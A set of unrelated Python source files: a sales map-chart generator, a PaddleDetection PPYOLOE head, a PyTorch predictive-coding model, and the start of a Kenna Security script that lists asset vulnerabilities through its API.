df_sales = pd.read_sql(con=conn, sql=sql_cmd)
max_sales = math.ceil(df_sales.loc[:,'Sales_Value'].max())
# write in to dict
dict_sales = {}
for month_item in month_list:
df_monthly_sales = df_sales.loc[df_sales['Month']==month_item, ['Province', 'Sales_Value']]
monthly_sales_result = df_monthly_sales.values.tolist()
dict_sales[month_item] = monthly_sales_result
# draw chart
self.draw_map_chart(dict_sales, max_sales, 'china')
def read_province_sales_data(self, province_selected):
database_full_name = self.__class__.database_path + self.__class__.bu_name + '_Hospital_Sales.db'
data_file_name = self.__class__.bu_name + '_Hospital_Sales'
conn = sqlite3.connect(database_full_name)
# get month list
sql_cmd = 'SELECT DISTINCT(Month) FROM ' + data_file_name
month_list = [item[0] for item in pd.read_sql(con=conn, sql=sql_cmd).values.tolist()]
# read city and monthly sales data from database
sql_cmd = 'SELECT Month, City, round(sum(Sales_Value)/1000000, 1) as Sales_Value FROM ' + data_file_name + \
' WHERE Province = \"' + province_selected + '\" GROUP BY City, Month ORDER BY Month'
df_sales = pd.read_sql(con=conn, sql=sql_cmd)
max_sales = math.ceil(df_sales.loc[:, 'Sales_Value'].max())
# write in to dict
dict_sales = {}
for month_item in month_list:
df_monthly_sales = df_sales.loc[df_sales['Month'] == month_item, ['City', 'Sales_Value']]
monthly_sales_result = df_monthly_sales.values.tolist()
dict_sales[month_item] = monthly_sales_result
# draw chart
self.draw_map_chart(dict_sales, max_sales, province_selected)
def draw_map_chart(self, data_input, data_max, region):
WarningType.ShowWarning = False
month_list = list(data_input.keys())
tl = Timeline(init_opts=opts.InitOpts(width="1200px", height="800px", theme=ThemeType.VINTAGE))
for month_item in month_list:
sales_data = data_input[month_item]
if region != 'china':
sales_data = [[item[0] + '市', item[1]] for item in sales_data]
map0 = (
Map()
.add(self.__class__.bu_name, sales_data, region)
.set_global_opts(
title_opts=opts.TitleOpts(title="%s销售数据(MM RMB) - %s" % (region, month_item)),
visualmap_opts=opts.VisualMapOpts(max_=data_max,
is_calculable=True,
range_color=["lightskyblue", "yellow", "orangered"],),
)
)
tl.add(map0, "{}".format(month_item))
chart_full_name = self.__class__.chart_path + "timeline_map.html"
tl.render(chart_full_name)
if platform.system() == "Linux":
subprocess.call(["xdg-open", chart_full_name])
else:
os.startfile(chart_full_name)
def generate_province_list(self):
database_full_name = self.__class__.database_path + self.__class__.bu_name + '_Hospital_Sales.db'
data_file_name = self.__class__.bu_name + '_Hospital_Sales'
conn = sqlite3.connect(database_full_name)
sql_cmd = 'SELECT DISTINCT(Province) FROM ' + data_file_name
df = pd.read_sql(con=conn, sql=sql_cmd)
province_list = [item[0] for item in df.values.tolist()]
return province_list
# get data list for AIO chart
def get_data_for_AIO_chart(self):
database_full_name = self.__class__.database_path + self.__class__.bu_name + '_Hospital_Sales.db'
data_file_name = self.__class__.bu_name + '_Hospital_Sales'
conn = sqlite3.connect(database_full_name)
sql_cmd = 'SELECT Month, Province, round(sum(Sales_Value),0) as Sales_Value FROM ' + data_file_name + \
' GROUP BY Month, Province Order by Month, Sales_Value DESC'
df_sales_result = pd.read_sql(con=conn, sql=sql_cmd)
# get month_list
month_list = df_sales_result['Month'].unique().tolist()
list_final_data = []
for month_item in month_list:
df_monthly_sales = df_sales_result.loc[df_sales_result['Month'] == month_item, ['Province', 'Sales_Value']]
df_monthly_sales['Ratio'] = df_monthly_sales['Sales_Value'] / df_monthly_sales['Sales_Value'].sum() * 100
list_monthly_sales = df_monthly_sales.values.tolist()
# generate dict for final data
list_value = []
for item_monthly_sales in list_monthly_sales:
[item_province, item_sales_value, item_ratio] = item_monthly_sales
list_value.append({"name": item_province, "value": [item_sales_value, item_ratio, item_province]})
list_final_data.append({'time': month_item, 'data': list_value})
# get monthly ttl IMS (in MM RMB)
df_monthly_ttl = df_sales_result.pivot_table(index='Month', values='Sales_Value', aggfunc=np.sum)
list_monthly_ttl = [round(item[0]/1000000,2) for item in df_monthly_ttl.values.tolist()]
# get min and max
minNum, maxNum = df_sales_result['Sales_Value'].min(), df_sales_result['Sales_Value'].max()
return [month_list, list_final_data, list_monthly_ttl, minNum, maxNum]
# generate AIO chart
def generate_AIO_chart(self, year, data, time_list, total_num, maxNum, minNum):
map_data = [
[[x["name"], x["value"]] for x in d["data"]] for d in data if d["time"] == year
][0]
min_data, max_data = (minNum, maxNum)
data_mark: List = []
i = 0
for x in time_list:
if x == year:
data_mark.append(total_num[i])
else:
data_mark.append("")
i = i + 1
map_chart = (
Map()
.add(
series_name="",
data_pair=map_data,
zoom=1,
center=[119.5, 34.5],
is_map_symbol_show=False,
itemstyle_opts={
"normal": {"areaColor": "#323c48", "borderColor": "#404a59"},
"emphasis": {
"label": {"show": Timeline},
"areaColor": "rgba(255,255,255, 0.5)",
},
},
)
.set_global_opts(
title_opts=opts.TitleOpts(
title="All-in-One Chart of IMS Distribution - " + str(year),
subtitle="",
pos_left="center",
pos_top="top",
title_textstyle_opts=opts.TextStyleOpts(
font_size=25, color="rgba(255,255,255, 0.9)"
),
),
tooltip_opts=opts.TooltipOpts(
is_show=True,
formatter=JsCode(
"""function(params) {
if ('value' in params.data) {
return params.data.value[2] + ': ' + params.data.value[0];
}
}"""
),
),
visualmap_opts=opts.VisualMapOpts(
is_calculable=True,
dimension=0,
pos_left="30",
pos_top="center",
range_text=["High", "Low"],
range_color=["lightskyblue", "yellow", "orangered"],
textstyle_opts=opts.TextStyleOpts(color="#ddd"),
min_=min_data,
max_=max_data,
),
)
)
line_chart = (
Line()
.add_xaxis(time_list)
.add_yaxis("", total_num)
.add_yaxis(
"",
data_mark,
markpoint_opts=opts.MarkPointOpts(data=[opts.MarkPointItem(type_="max")]),
)
.set_series_opts(label_opts=opts.LabelOpts(is_show=False))
.set_global_opts(
title_opts=opts.TitleOpts(
title="Monthly IMS Total Value (MM RMB)", pos_left="72%", pos_top="5%"
)
)
)
bar_x_data = [x[0] for x in map_data]
bar_y_data = [{"name": x[0], "value": x[1][0]} for x in map_data]
bar = (
Bar()
.add_xaxis(xaxis_data=bar_x_data)
.add_yaxis(
series_name="",
y_axis=bar_y_data,
label_opts=opts.LabelOpts(
is_show=True, position="right", formatter="{b} : {c}"
),
)
.reversal_axis()
.set_global_opts(
xaxis_opts=opts.AxisOpts(
max_=maxNum, axislabel_opts=opts.LabelOpts(is_show=False)
),
yaxis_opts=opts.AxisOpts(axislabel_opts=opts.LabelOpts(is_show=False)),
tooltip_opts=opts.TooltipOpts(is_show=False),
visualmap_opts=opts.VisualMapOpts(
is_calculable=True,
dimension=0,
pos_left="10",
pos_top="top",
range_text=["High", "Low"],
range_color=["lightskyblue", "yellow", "orangered"],
textstyle_opts=opts.TextStyleOpts(color="#ddd"),
min_=min_data,
max_=max_data,
),
)
)
pie_data = [[x[0], x[1][0]] for x in map_data]
pie = (
Pie()
.add(
series_name="",
data_pair=pie_data,
radius=["15%", "35%"],
center=["80%", "82%"],
itemstyle_opts=opts.ItemStyleOpts(
border_width=1, border_color="rgba(0,0,0,0.3)"
),
)
.set_global_opts(
tooltip_opts=opts.TooltipOpts(is_show=True, formatter="{b} {d}%"),
legend_opts=opts.LegendOpts(is_show=False),
)
)
grid_chart = (
Grid()
.add(
bar,
grid_opts=opts.GridOpts(
pos_left="10", pos_right="45%", pos_top="50%", pos_bottom="5"
),
)
.add(
line_chart,
grid_opts=opts.GridOpts(
pos_left="65%", pos_right="80", pos_top="10%", pos_bottom="50%"
),
)
.add(pie, grid_opts=opts.GridOpts(pos_left="45%", pos_top="60%"))
.add(map_chart, grid_opts=opts.GridOpts())
)
return grid_chart
def start_generate_AIO_chart(self):
WarningType.ShowWarning = False
[time_list, data, total_num, minNum, maxNum] = self.get_data_for_AIO_chart()
timeline = Timeline(
init_opts=opts.InitOpts(width="1600px", height="900px", theme=ThemeType.PURPLE_PASSION)
)
for y in time_list:
g = self.generate_AIO_chart(y, data, time_list, total_num, maxNum, minNum)
timeline.add(g, time_point=str(y))
timeline.add_schema(
orient="vertical",
is_auto_play=True,
is_inverse=True,
play_interval=5000,
pos_left="null",
pos_right="5",
pos_top="20",
pos_bottom="20",
width="60",
label_opts=opts.LabelOpts(is_show=True, color="#fff"),
)
chart_full_name = self.__class__.chart_path + "AIO.html"
timeline.render(chart_full_name)
if platform.system() == "Linux":
subprocess.call(["xdg-open", chart_full_name])
else:
os.startfile(chart_full_name)
pass
if __name__ == '__main__':
test = HospitalSalesCalculation('TU')
test.start_generate_AIO_chart()
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import paddle
import paddle.nn as nn
import paddle.nn.functional as F
from ppdet.core.workspace import register
from ..bbox_utils import batch_distance2bbox
from ..losses import GIoULoss
from ..initializer import bias_init_with_prob, constant_, normal_
from ..assigners.utils import generate_anchors_for_grid_cell
from ppdet.modeling.backbones.cspresnet import ConvBNLayer
from ppdet.modeling.ops import get_static_shape, paddle_distributed_is_initialized, get_act_fn
__all__ = ['PPYOLOEHead']
class ESEAttn(nn.Layer):
def __init__(self, feat_channels, act='swish'):
super(ESEAttn, self).__init__()
self.fc = nn.Conv2D(feat_channels, feat_channels, 1)
self.conv = ConvBNLayer(feat_channels, feat_channels, 1, act=act)
self._init_weights()
def _init_weights(self):
normal_(self.fc.weight, std=0.001)
def forward(self, feat, avg_feat):
weight = F.sigmoid(self.fc(avg_feat))
return self.conv(feat * weight)
@register
class PPYOLOEHead(nn.Layer):
__shared__ = ['num_classes', 'trt', 'exclude_nms']
__inject__ = ['static_assigner', 'assigner', 'nms']
def __init__(self,
in_channels=[1024, 512, 256],
num_classes=80,
act='swish',
fpn_strides=(32, 16, 8),
grid_cell_scale=5.0,
grid_cell_offset=0.5,
reg_max=16,
static_assigner_epoch=4,
use_varifocal_loss=True,
static_assigner='ATSSAssigner',
assigner='TaskAlignedAssigner',
nms='MultiClassNMS',
eval_input_size=[],
loss_weight={
'class': 1.0,
'iou': 2.5,
'dfl': 0.5,
},
trt=False,
exclude_nms=False):
super(PPYOLOEHead, self).__init__()
assert len(in_channels) > 0, "len(in_channels) should > 0"
self.in_channels = in_channels
self.num_classes = num_classes
self.fpn_strides = fpn_strides
self.grid_cell_scale = grid_cell_scale
self.grid_cell_offset = grid_cell_offset
self.reg_max = reg_max
self.iou_loss = GIoULoss()
self.loss_weight = loss_weight
self.use_varifocal_loss = use_varifocal_loss
self.eval_input_size = eval_input_size
self.static_assigner_epoch = static_assigner_epoch
self.static_assigner = static_assigner
self.assigner = assigner
self.nms = nms
self.exclude_nms = exclude_nms
# stem
self.stem_cls = nn.LayerList()
self.stem_reg = nn.LayerList()
act = get_act_fn(
act, trt=trt) if act is None or isinstance(act,
(str, dict)) else act
for in_c in self.in_channels:
self.stem_cls.append(ESEAttn(in_c, act=act))
self.stem_reg.append(ESEAttn(in_c, act=act))
# pred head
self.pred_cls = nn.LayerList()
self.pred_reg = nn.LayerList()
for in_c in self.in_channels:
self.pred_cls.append(
nn.Conv2D(
in_c, self.num_classes, 3, padding=1))
self.pred_reg.append(
nn.Conv2D(
in_c, 4 * (self.reg_max + 1), 3, padding=1))
# projection conv
self.proj_conv = nn.Conv2D(self.reg_max + 1, 1, 1, bias_attr=False)
self._init_weights()
@classmethod
def from_config(cls, cfg, input_shape):
return {'in_channels': [i.channels for i in input_shape], }
def _init_weights(self):
bias_cls = bias_init_with_prob(0.01)
for cls_, reg_ in zip(self.pred_cls, self.pred_reg):
constant_(cls_.weight)
constant_(cls_.bias, bias_cls)
constant_(reg_.weight)
constant_(reg_.bias, 1.0)
self.proj = paddle.linspace(0, self.reg_max, self.reg_max + 1)
self.proj_conv.weight.set_value(
self.proj.reshape([1, self.reg_max + 1, 1, 1]))
self.proj_conv.weight.stop_gradient = True
if self.eval_input_size:
anchor_points, stride_tensor = self._generate_anchors()
self.register_buffer('anchor_points', anchor_points)
self.register_buffer('stride_tensor', stride_tensor)
def forward_train(self, feats, targets):
anchors, anchor_points, num_anchors_list, stride_tensor = \
generate_anchors_for_grid_cell(
feats, self.fpn_strides, self.grid_cell_scale,
self.grid_cell_offset)
cls_score_list, reg_distri_list = [], []
for i, feat in enumerate(feats):
avg_feat = F.adaptive_avg_pool2d(feat, (1, 1))
cls_logit = self.pred_cls[i](self.stem_cls[i](feat, avg_feat) +
feat)
reg_distri = self.pred_reg[i](self.stem_reg[i](feat, avg_feat))
# cls and reg
cls_score = F.sigmoid(cls_logit)
cls_score_list.append(cls_score.flatten(2).transpose([0, 2, 1]))
reg_distri_list.append(reg_distri.flatten(2).transpose([0, 2, 1]))
cls_score_list = paddle.concat(cls_score_list, axis=1)
reg_distri_list = paddle.concat(reg_distri_list, axis=1)
return self.get_loss([
cls_score_list, reg_distri_list, anchors, anchor_points,
num_anchors_list, stride_tensor
], targets)
def _generate_anchors(self, feats=None):
# just use in eval time
anchor_points = []
stride_tensor = []
for i, stride in enumerate(self.fpn_strides):
if feats is not None:
_, _, h, w = feats[i].shape
else:
h = int(self.eval_input_size[0] / stride)
w = int(self.eval_input_size[1] / stride)
shift_x = paddle.arange(end=w) + self.grid_cell_offset
shift_y = paddle.arange(end=h) + self.grid_cell_offset
shift_y, shift_x = paddle.meshgrid(shift_y, shift_x)
anchor_point = paddle.cast(
paddle.stack(
[shift_x, shift_y], axis=-1), dtype='float32')
anchor_points.append(anchor_point.reshape([-1, 2]))
stride_tensor.append(
paddle.full(
[h * w, 1], stride, dtype='float32'))
anchor_points = paddle.concat(anchor_points)
stride_tensor = paddle.concat(stride_tensor)
return anchor_points, stride_tensor
def forward_eval(self, feats):
if self.eval_input_size:
anchor_points, stride_tensor = self.anchor_points, self.stride_tensor
else:
anchor_points, stride_tensor = self._generate_anchors(feats)
cls_score_list, reg_dist_list = [], []
for i, feat in enumerate(feats):
b, _, h, w = feat.shape
l = h * w
avg_feat = F.adaptive_avg_pool2d(feat, (1, 1))
cls_logit = self.pred_cls[i](self.stem_cls[i](feat, avg_feat) +
feat)
reg_dist = self.pred_reg[i](self.stem_reg[i](feat, avg_feat))
reg_dist = reg_dist.reshape([-1, 4, self.reg_max + 1, l]).transpose(
[0, 2, 1, 3])
reg_dist = self.proj_conv(F.softmax(reg_dist, axis=1))
# cls and reg
cls_score = F.sigmoid(cls_logit)
cls_score_list.append(cls_score.reshape([b, self.num_classes, l]))
reg_dist_list.append(reg_dist.reshape([b, 4, l]))
cls_score_list = paddle.concat(cls_score_list, axis=-1)
reg_dist_list = paddle.concat(reg_dist_list, axis=-1)
return cls_score_list, reg_dist_list, anchor_points, stride_tensor
def forward(self, feats, targets=None):
assert len(feats) == len(self.fpn_strides), \
"The size of feats is not equal to size of fpn_strides"
if self.training:
return self.forward_train(feats, targets)
else:
return self.forward_eval(feats)
@staticmethod
def _focal_loss(score, label, alpha=0.25, gamma=2.0):
weight = (score - label).pow(gamma)
if alpha > 0:
alpha_t = alpha * label + (1 - alpha) * (1 - label)
weight *= alpha_t
loss = F.binary_cross_entropy(
score, label, weight=weight, reduction='sum')
return loss
@staticmethod
def _varifocal_loss(pred_score, gt_score, label, alpha=0.75, gamma=2.0):
weight = alpha * pred_score.pow(gamma) * (1 - label) + gt_score * label
loss = F.binary_cross_entropy(
pred_score, gt_score, weight=weight, reduction='sum')
return loss
def _bbox_decode(self, anchor_points, pred_dist):
b, l, _ = get_static_shape(pred_dist)
pred_dist = F.softmax(pred_dist.reshape([b, l, 4, self.reg_max + 1
])).matmul(self.proj)
return batch_distance2bbox(anchor_points, pred_dist)
def _bbox2distance(self, points, bbox):
x1y1, x2y2 = paddle.split(bbox, 2, -1)
lt = points - x1y1
rb = x2y2 - points
return paddle.concat([lt, rb], -1).clip(0, self.reg_max - 0.01)
def _df_loss(self, pred_dist, target):
target_left = paddle.cast(target, 'int64')
target_right = target_left + 1
weight_left = target_right.astype('float32') - target
weight_right = 1 - weight_left
loss_left = F.cross_entropy(
pred_dist, target_left, reduction='none') * weight_left
loss_right = F.cross_entropy(
pred_dist, target_right, reduction='none') * weight_right
return (loss_left + loss_right).mean(-1, keepdim=True)
def _bbox_loss(self, pred_dist, pred_bboxes, anchor_points, assigned_labels,
assigned_bboxes, assigned_scores, assigned_scores_sum):
# select positive samples mask
mask_positive = (assigned_labels != self.num_classes)
num_pos = mask_positive.sum()
# pos/neg loss
if num_pos > 0:
# l1 + iou
bbox_mask = mask_positive.unsqueeze(-1).tile([1, 1, 4])
pred_bboxes_pos = paddle.masked_select(pred_bboxes,
bbox_mask).reshape([-1, 4])
assigned_bboxes_pos = paddle.masked_select(
assigned_bboxes, bbox_mask).reshape([-1, 4])
bbox_weight = paddle.masked_select(
assigned_scores.sum(-1), mask_positive).unsqueeze(-1)
loss_l1 = F.l1_loss(pred_bboxes_pos, assigned_bboxes_pos)
loss_iou = self.iou_loss(pred_bboxes_pos,
assigned_bboxes_pos) * bbox_weight
loss_iou = loss_iou.sum() / assigned_scores_sum
dist_mask = mask_positive.unsqueeze(-1).tile(
[1, 1, (self.reg_max + 1) * 4])
pred_dist_pos = paddle.masked_select(
pred_dist, dist_mask).reshape([-1, 4, self.reg_max + 1])
assigned_ltrb = self._bbox2distance(anchor_points, assigned_bboxes)
assigned_ltrb_pos = paddle.masked_select(
assigned_ltrb, bbox_mask).reshape([-1, 4])
loss_dfl = self._df_loss(pred_dist_pos,
assigned_ltrb_pos) * bbox_weight
loss_dfl = loss_dfl.sum() / assigned_scores_sum
else:
loss_l1 = paddle.zeros([1])
loss_iou = paddle.zeros([1])
loss_dfl = paddle.zeros([1])
return loss_l1, loss_iou, loss_dfl
def get_loss(self, head_outs, gt_meta):
pred_scores, pred_distri, anchors,\
anchor_points, num_anchors_list, stride_tensor = head_outs
anchor_points_s = anchor_points / stride_tensor
pred_bboxes = self._bbox_decode(anchor_points_s, pred_distri)
gt_labels = gt_meta['gt_class']
gt_bboxes = gt_meta['gt_bbox']
pad_gt_mask = gt_meta['pad_gt_mask']
# label assignment
if gt_meta['epoch_id'] < self.static_assigner_epoch:
assigned_labels, assigned_bboxes, assigned_scores = \
self.static_assigner(
anchors,
num_anchors_list,
gt_labels,
gt_bboxes,
pad_gt_mask,
bg_index=self.num_classes,
pred_bboxes=pred_bboxes.detach() * stride_tensor)
alpha_l = 0.25
else:
assigned_labels, assigned_bboxes, assigned_scores = \
self.assigner(
pred_scores.detach(),
pred_bboxes.detach() * stride_tensor,
anchor_points,
num_anchors_list,
gt_labels,
gt_bboxes,
pad_gt_mask,
bg_index=self.num_classes)
alpha_l = -1
# rescale bbox
assigned_bboxes /= stride_tensor
# cls loss
if self.use_varifocal_loss:
one_hot_label = F.one_hot(assigned_labels, self.num_classes)
loss_cls = self._varifocal_loss(pred_scores, assigned_scores,
one_hot_label)
else:
loss_cls = self._focal_loss(pred_scores, assigned_scores, alpha_l)
assigned_scores_sum = assigned_scores.sum()
if paddle_distributed_is_initialized():
paddle.distributed.all_reduce(assigned_scores_sum)
assigned_scores_sum = paddle.clip(
assigned_scores_sum / paddle.distributed.get_world_size(),
min=1)
loss_cls /= assigned_scores_sum
loss_l1, loss_iou, loss_dfl = \
self._bbox_loss(pred_distri, pred_bboxes, anchor_points_s,
assigned_labels, assigned_bboxes, assigned_scores,
assigned_scores_sum)
loss = self.loss_weight['class'] * loss_cls + \
self.loss_weight['iou'] * loss_iou + \
self.loss_weight['dfl'] * loss_dfl
out_dict = {
'loss': loss,
'loss_cls': loss_cls,
'loss_iou': loss_iou,
'loss_dfl': loss_dfl,
'loss_l1': loss_l1,
}
return out_dict
def post_process(self, head_outs, img_shape, scale_factor):
pred_scores, pred_dist, anchor_points, stride_tensor = head_outs
pred_bboxes = batch_distance2bbox(anchor_points,
pred_dist.transpose([0, 2, 1]))
pred_bboxes *= stride_tensor
# scale bbox to origin
scale_y, scale_x = paddle.split(scale_factor, 2, axis=-1)
scale_factor = paddle.concat(
[scale_x, scale_y, scale_x, scale_y], axis=-1).reshape([-1, 1, 4])
pred_bboxes /= scale_factor
if self.exclude_nms:
# `exclude_nms=True` just use in benchmark
return pred_bboxes.sum(), pred_scores.sum()
else:
bbox_pred, bbox_num, _ = self.nms(pred_bboxes, pred_scores)
return bbox_pred, bbox_num
|
import logging
import torch
from pybrid import utils
from pybrid.models.base import BaseModel
from pybrid.layers import FCLayer
class HybridModel(BaseModel):
def __init__(
self,
nodes,
amort_nodes,
act_fn,
mu_dt=0.01,
use_bias=False,
kaiming_init=False,
):
self.nodes = nodes
self.amort_nodes = amort_nodes
self.mu_dt = mu_dt
self.num_nodes = len(nodes)
self.num_layers = len(nodes) - 1
self.total_params = 0
self.layers = []
self.amort_layers = []
for l in range(self.num_layers):
layer_act_fn = utils.Linear() if (l == self.num_layers - 1) else act_fn
layer = FCLayer(
in_size=nodes[l],
out_size=nodes[l + 1],
act_fn=layer_act_fn,
use_bias=use_bias,
kaiming_init=kaiming_init,
)
self.layers.append(layer)
self.total_params = self.total_params + ((nodes[l] * nodes[l + 1]) + nodes[l + 1])
amort_layer = FCLayer(
in_size=amort_nodes[l],
out_size=amort_nodes[l + 1],
act_fn=layer_act_fn, # TODO
use_bias=use_bias,
kaiming_init=kaiming_init,
is_amortised=True,
)
self.amort_layers.append(amort_layer)
self.mean_weights, self.mean_biases = self.get_weight_stats()
def reset(self):
self.preds = [[] for _ in range(self.num_nodes)]
self.errs = [[] for _ in range(self.num_nodes)]
self.q_preds = [[] for _ in range(self.num_nodes)]
self.q_errs = [[] for _ in range(self.num_nodes)]
self.mus = [[] for _ in range(self.num_nodes)]
def reset_mu(self, batch_size, init_std=0.05):
for l in range(self.num_layers):
tensor = torch.empty(batch_size, self.layers[l].in_size).normal_(mean=0, std=init_std)
self.mus[l] = utils.set_tensor(tensor)
def set_img_batch(self, img_batch):
self.mus[-1] = img_batch.clone()
def set_img_batch_amort(self, img_batch):
self.q_preds[0] = img_batch.clone()
def set_label_batch(self, label_batch):
self.mus[0] = label_batch.clone()
def forward(self, val):
for layer in self.amort_layers:
val = layer.forward(val)
return val
def backward(self, val):
for layer in self.layers:
val = layer.forward(val)
return val
def forward_mu(self):
for l in range(1, self.num_nodes):
self.q_preds[l] = self.amort_layers[l - 1].forward(self.q_preds[l - 1])
mus = self.q_preds[::-1]
for l in range(self.num_nodes):
self.mus[l] = mus[l].clone()
def backward_mu(self):
for l in range(1, self.num_layers):
self.mus[l] = self.layers[l - 1].forward(self.mus[l - 1])
def train_batch(
self,
img_batch,
label_batch,
num_iters=20,
init_std=0.05,
fixed_preds=False,
use_amort=True,
thresh=None,
no_backward=False,
):
self.reset()
if use_amort:
self.set_img_batch_amort(img_batch)
self.forward_mu()
self.set_img_batch(img_batch)
else:
if not no_backward:
self.set_label_batch(label_batch)
self.backward_mu()
self.set_img_batch(img_batch)
else:
self.reset_mu(img_batch.size(0), init_std)
self.set_img_batch(img_batch)
self.set_label_batch(label_batch)
num_iter, avg_errs = self.train_updates(num_iters, fixed_preds=fixed_preds, thresh=thresh)
self.update_grads()
if use_amort:
self.update_amort_grads()
return num_iter, avg_errs
def test_batch(
self,
img_batch,
num_iters=100,
init_std=0.05,
fixed_preds=False,
use_amort=True,
thresh=None,
):
self.reset()
if use_amort:
self.set_img_batch_amort(img_batch)
self.forward_mu()
else:
self.reset_mu(img_batch.size(0), init_std)
self.set_img_batch(img_batch)
num_iter, avg_errs = self.test_updates(num_iters, fixed_preds=fixed_preds, thresh=thresh)
return self.mus[0], num_iter, avg_errs
def train_updates(self, num_iters, fixed_preds=False, thresh=None):
for n in range(1, self.num_nodes):
self.preds[n] = self.layers[n - 1].forward(self.mus[n - 1])
self.errs[n] = self.mus[n] - self.preds[n]
avg_errs = []
avg_err = self.get_errors()[0] / self.total_params
avg_errs.append(avg_err)
itr = 0
for itr in range(num_iters):
for l in range(1, self.num_layers):
delta = self.layers[l].backward(self.errs[l + 1]) - self.errs[l]
self.mus[l] = self.mus[l] + self.mu_dt * (2 * delta)
for n in range(1, self.num_nodes):
if not fixed_preds:
self.preds[n] = self.layers[n - 1].forward(self.mus[n - 1])
self.errs[n] = self.mus[n] - self.preds[n]
avg_err = self.get_errors()[0] / self.total_params
avg_errs.append(avg_err)
if thresh is not None and avg_err < thresh:
break
return itr, avg_errs
def test_updates(self, num_iters, fixed_preds=False, thresh=None):
for n in range(1, self.num_nodes):
self.preds[n] = self.layers[n - 1].forward(self.mus[n - 1])
self.errs[n] = self.mus[n] - self.preds[n]
avg_errs = []
avg_err = self.get_errors()[0] / self.total_params
avg_errs.append(avg_err)
itr = 0
for itr in range(num_iters):
delta = self.layers[0].backward(self.errs[1])
self.mus[0] = self.mus[0] + self.mu_dt * (2 * delta)
for l in range(1, self.num_layers):
delta = self.layers[l].backward(self.errs[l + 1]) - self.errs[l]
self.mus[l] = self.mus[l] + self.mu_dt * (2 * delta)
for n in range(1, self.num_nodes):
if not fixed_preds:
self.preds[n] = self.layers[n - 1].forward(self.mus[n - 1])
self.errs[n] = self.mus[n] - self.preds[n]
avg_err = self.get_errors()[0] / self.total_params
avg_errs.append(avg_err)
if thresh is not None and avg_err < thresh:
break
return itr, avg_errs
def update_grads(self):
for l in range(self.num_layers):
self.layers[l].update_gradient(self.errs[l + 1])
def update_amort_grads(self):
for q, l in zip(reversed(range(1, self.num_nodes)), range(self.num_layers)):
self.q_errs[q] = self.mus[l] - self.q_preds[q]
for l in range(self.num_layers):
self.amort_layers[l].update_gradient(self.q_errs[l + 1])
def get_errors(self):
total_err = 0
for err in self.errs:
if len(err) > 0:
total_err = total_err + torch.sum(torch.abs(err)).item()
q_total_err = 0
for err in self.q_errs:
if len(err) > 0:
q_total_err = q_total_err + torch.sum(torch.abs(err)).item()
return total_err, q_total_err
def get_losses(self):
try:
return (
torch.sum(torch.abs(self.errs[-1])).item(),
torch.sum(torch.abs(self.q_errs[-1])).item(),
)
except:
return torch.sum(torch.abs(self.errs[-1])).item(), 0
def get_weight_stats(self):
mean_abs_weights, mean_abs_biases = [], []
for l in range(self.num_layers):
mean_abs_weights.append(torch.mean(torch.abs(self.layers[l].weights)).item())
mean_abs_biases.append(torch.mean(torch.abs(self.layers[l].bias)).item())
return mean_abs_weights, mean_abs_biases
def normalize_weights(self):
for l in range(self.num_layers):
mean_weights = torch.mean(torch.abs(self.layers[l].weights))
self.layers[l].weights = self.layers[l].weights * self.mean_weights[l] / mean_weights
mean_bias = torch.mean(torch.abs(self.layers[l].bias))
self.layers[l].bias = self.layers[l].bias * self.mean_biases[l] / mean_bias
@property
def params(self):
return self.layers + self.amort_layers
def __str__(self):
return f"<HybridModel> {self.nodes}"
|
<gh_stars>1-10
import os
import sys
import time
import math
import requests
# Might have to change this
base_url = "https://api.kennasecurity.com/assets"
ASSETS_PER_PAGE = 500
#
def get_asset_page(page_num):
page_param = "?page=" + str(page_num)
url = base_url + page_param
# Obtain the specified page.
try:
response = requests.get(url, headers=headers)
except Exception as exp:
print("List Asset Error: {str(exp)}")
sys.exit(1)
if response.status_code != 200:
print(f"List Asset Error: {response.status_code}")
print(f"Messages: {response.json()['message']}")
sys.exit(1)
return response.json()
# Obtain and write vulnerability information per asset ID into the specified file.
def get_vuln_info(api_key, vuln_url, asset_id, avfp, avlfp):
headers = {'Accept': 'application/json',
'Content-Type': 'application/json; charset=utf-8',
'X-Risk-Token': api_key}
vuln_url = "https://" + vuln_url
try:
response = requests.get(vuln_url, headers=headers)
http_status_code = response.status_code
# If too many requests, wait a second. If is happens again, error out.
if http_status_code == 429:
time.sleep(1)
response = requests.get(vuln_url, headers=headers)
response.raise_for_status()
except Exception as exp:
print(f"Get vuln info error: {str(exp)}")
return
resp_json = response.json()
vulns = resp_json['vulnerabilities']
num_vulns = len(vulns)
print(f"Vulnerabilities for asset ID {asset_id} ({num_vulns})", file=avlfp)
for vuln in vulns:
print(vuln, file=avfp)
return num_vulns
if __name__ == "__main__":
print("Vulnerabilities per Asset by Page")
api_key = os.getenv('KENNA_API_KEY')
if api_key is None:
print("Environment variable KENNA_API_KEY is non-existent")
sys.exit(1)
headers = {'X-Risk-Token': api_key,
'Accept': "application/json"
}
# Open files for vulnerabilities per asset, and vulnerabilites info based on search ID.
avfp = open("asset_vuln_info", "w")
avlfp = open("asset_vuln_log", "w")
max_allowed_pages = 20
asset_count = 0
page_num = 1
# Obtain the first page.
resp_json = get_asset_page(page_num)
# Determine the number of pages and print an appropriate error message.
meta = resp_json['meta']
num_pages = meta['pages']
if num_pages > max_allowed_pages:
print(f"Number of pages = {num_pages} which exceeds the maximum allowed of {max_allowed_pages}")
print("Will only output the first 10,000 assets.")
num_pages = max_allowed_pages
# Only a guess since all we know is the number of pages.
asset_count = num_pages * ASSETS_PER_PAGE
print(f"Will process between {asset_count - ASSETS_PER_PAGE} and {asset_count} assets.")
asset_cntr = 0
vuln_cntr = 0
start_time = time.perf_counter()
acc_start_time = start_time
# Loop through all the assets one page a time, and get the vulnerabilities for each asset.
while page_num <= num_pages:
resp_json = get_asset_page(page_num)
assets = resp_json['assets']
# Adjust the total page count on the last page.
page_asset_count = len(assets)
if page_asset_count < ASSETS_PER_PAGE:
asset_count = ((page_num - 1) * ASSETS_PER_PAGE) + page_asset_count
# Get the vulnerabilities for each asset.
for asset in assets:
vuln_url = asset['urls']['vulnerabilities']
vuln_cntr += get_vuln_info(api_key, vuln_url, str(asset['id']), avfp, avlfp)
asset_cntr += 1
# Do some timings and adjust estimated time left.
if asset_cntr != 0 and asset_cntr % 5 == 0:
